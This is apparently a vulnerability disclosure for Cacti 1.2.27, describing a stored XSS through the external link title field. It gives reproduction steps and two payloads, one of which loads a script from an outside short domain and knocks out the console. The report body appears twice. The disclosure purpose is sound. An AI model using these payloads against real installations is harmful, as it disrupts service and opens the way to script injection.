Summary
title parameter is not properly sanitized when saving external links in links.php . Morever, the said title parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS.
Details
Users with the privilege to create external links can manipulate the title parameter in the http post request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping.
The screenshot below shows the tester entered the payload <svg/onload=alert()> to prove the existence of the XSS vulnerability.
The screenshot below shows the http post request that was sent. As seen, the payload resides in the title parameter.
The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test which is 1.2.27.
The screenshot below shows that the alert box popped up, thereby existence of the XSS vulnerability is proven.
This xss vulnerability has its limitations due to the fact that the aforementioned title parameter does not allow long strings to be entered. Therefore, in its current state of the payload, this vulnerability does not have an impact on neither confidentiality nor integrity. However, as seen the screenshot below, the following payload <script/src=//⑮.rs causes denial of service in the frontend thereby rendering the application unavailable.
As seen in the screenshot below, clicking the items (valid for all items in the console menu) in the console menu no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
- Go to External Links under Utilities menu.
- Click on + sign to add a new external link.
- Choose Console Menu as style.
- Choose External Links as Console Menu Section.
- Place payload1 or payload2 as the Tab/Menu Name.
- Add a random Web URL Location.
- Click on save.
- Finally, click on Main Console (index.php) to trigger the XSS (one may need to refresh the page).
Impact
Denial of Service
TayfunYelim Reporter
Summary
titleparameter is not properly sanitized when saving external links in links.php . Morever, the said title parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS.Details
Users with the privilege to create external links can manipulate the
titleparameter in the http post request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping.The screenshot below shows the tester entered the payload
<svg/onload=alert()>to prove the existence of the XSS vulnerability.The screenshot below shows the http post request that was sent. As seen, the payload resides in the title parameter.
The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test which is 1.2.27.
The screenshot below shows that the alert box popped up, thereby existence of the XSS vulnerability is proven.
This xss vulnerability has its limitations due to the fact that the aforementioned title parameter does not allow long strings to be entered. Therefore, in its current state of the payload, this vulnerability does not have an impact on neither confidentiality nor integrity. However, as seen the screenshot below, the following payload
<script/src=//⑮.rscauses denial of service in the frontend thereby rendering the application unavailable.As seen in the screenshot below, clicking the items (valid for all items in the console menu) in the console menu no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
Impact
Denial of Service